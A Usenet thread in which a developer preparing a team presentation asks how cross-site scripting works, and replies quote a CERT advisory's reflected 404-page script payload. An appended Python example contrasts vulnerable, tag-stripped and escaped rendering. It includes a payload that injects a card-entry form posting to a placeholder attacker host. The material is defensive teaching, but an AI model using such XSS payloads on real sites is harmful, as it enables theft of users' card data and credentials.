"chotiwallah" <ch*********@web.de> wrote in message
news:78*************************@posting.google.com...
"Venkat" <ve*******@yahoo.com> wrote in message
news:<1088746968.295723@sj-nntpcache-3>...
Hi All,
I would like to know about Cross Site Scripting. I googled XSS and got the
point of what it is but didn't get how it is achieved.
Can someone describe to me with an example how a hacker does it?
My intention is not to hack anything, but I am preparing a presentation
on this and would like to caution my teammates about the consequences of
XSS and how to protect our web-based applications from a possible attack.
Any help in this is greatly appreciated.
regards,
Venkat
cross site scripting basically means that somebody injects script code
(i.e. javascript or vbscript) into your code via <input>, the url or the
query string. this alien code gets executed on your site as if it
belonged there.
basic countermeasure: validate any user input, meaning strip tags and/or
special characters out of data before you process that data any
further.
this is a good doc: http://www.cert.org/archive/pdf/cros..._scripting.pdf,
contains further links, too
micha
Thanks micha for a very quick response. I had gone through the link
http://www.cert.org/archive/pdf/cros..._scripting.pdf,
and I am a bit confused here.
The author cited an example of a popular auction site where
a bad guy BG12345 (hacker) had posted some items for sale on the auction site;
we get lured by his posting and click on the link,
which will take us to the bad guy's (BG12345) site. We then select an item on
his (BG12345) page, which will take us back to the auction site (an invalid page,
that of the intruder).
We then give away our credit card details and click the submit button;
these details are actually submitted to the bad guy BG12345's site and not
to the auction site.
The above example looks clear and fair enough, but I am confused when the
author explains the way BG12345 the bad guy was able to achieve this.
He says
BG12345's web site offered a link to auction.example.com that looked
something like this:
<A HREF=http://auction.example.com/<script>alert('hello')</script>">Click
Here</a>
The "FILENAME.html" submitted to auction.example.com was,
<script>alert('hello')</script>
auction.example.com then used its ordinary routines to generate an error
page to you that read,
<HTML> 404 page not found: <script>alert('hello')</script>
..... </HTML>
In effect, BG12345 managed to "inject" a JavaScript program into the page
returned to you by auction.example.com. The JavaScript ran as though it
originated at auction.example.com, and could therefore process events in
that document. It also maintained communication with BG12345 by virtue of
scripting that BG12345 put in the link; this is the way a CSS vulnerability
can be exploited to "sniff" sensitive data from within a web page, including
passwords, credit card numbers, and any other arbitrary information you
input. There are a number of variants to this problem. Odds are that
bank.example.com also has the same vulnerability somewhere on its site.
BG12345 could potentially access your bank account and transfer funds using
the same process.
In the above example he is saying the auction site had generated an error
page to the user and the intruder was able to inject some JavaScript code
which got executed in the user's browser. I want to know, when the user gets an error
page, how can he submit his credit card details to the intruder?
Basically I am not able to relate the example to the explanation; could
you please help me out in understanding this.
Thanks,
Venkat
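An added worked example, in Python, of the 404 reflection quoted from the CERT advisory above and of the countermeasure micha gave earlier in the thread. This is my own code, not from the advisory or from either poster. It decodes the attacker's link into the path the server looks up, renders the error page three ways (verbatim as in the advisory, tag-stripped as micha suggests, and HTML-escaped), and checks which variants still carry an executable <script> element. The host auction.example.com and the "404 page not found" text come from the quoted passage; the percent-encoding of the link, the SNIFF_PAYLOAD form and the host attacker.example are constructed for the illustration and show one way the "sniffing" the advisory mentions can look: because the injected script runs with the auction site's origin, it can write its own card-entry form into the error page and point that form at the attacker.

```python
import html
import re
from urllib.parse import unquote

# Constructed attacker link, modelled on the CERT example quoted in the thread.
# The host is the advisory's; percent-encoding the payload is my assumption
# (a browser encodes the angle brackets before sending the request).
ATTACKER_HREF = (
    "http://auction.example.com/"
    "%3Cscript%3Ealert('hello')%3C/script%3E"
)

# Constructed payload illustrating the "sniffing" described in the advisory:
# the script executes in auction.example.com's origin, so it can draw a form
# on that page whose submission goes to the attacker. attacker.example is a
# placeholder host chosen for this example.
SNIFF_PAYLOAD = (
    "<script>document.write('<form action=\"http://attacker.example/collect\">"
    "Card number: <input name=cc><input type=submit></form>')</script>"
)


def requested_path(href: str) -> str:
    """Return the decoded path a web server would look up for this link."""
    after_scheme = href.split("://", 1)[1]
    path = after_scheme.split("/", 1)[1] if "/" in after_scheme else ""
    return unquote(path)


def render_404_vulnerable(path: str) -> str:
    """The advisory's 'ordinary routine': the missing file name is copied
    verbatim into the HTML, so markup in the path becomes markup in the page."""
    return f"<HTML> 404 page not found: {path} ..... </HTML>"


def render_404_stripped(path: str) -> str:
    """micha's countermeasure, tag stripping. It defuses this payload, but it
    also discards legitimate characters and is easy to get wrong."""
    return f"<HTML> 404 page not found: {re.sub(r'<[^>]*>', '', path)} ..... </HTML>"


def render_404_escaped(path: str) -> str:
    """HTML-escape untrusted data at the point it is written into HTML; the
    browser then displays the text of the payload instead of executing it."""
    return f"<HTML> 404 page not found: {html.escape(path, quote=True)} ..... </HTML>"


def has_live_script(page: str) -> bool:
    """Crude check that a literal <script> element reached the page."""
    return "<script" in page.lower()


if __name__ == "__main__":
    path = requested_path(ATTACKER_HREF)
    for name, render in (("vulnerable", render_404_vulnerable),
                         ("stripped", render_404_stripped),
                         ("escaped", render_404_escaped)):
        page = render(path)
        print(f"{name:10} live script: {has_live_script(page)}\n    {page}")
    print("\nsniffing variant, vulnerable renderer:")
    print(render_404_vulnerable(SNIFF_PAYLOAD))
```

Escaping is the safer of the two countermeasures because it keeps the data intact and makes the output context explicit; stripping is shown only because it is what the thread proposes.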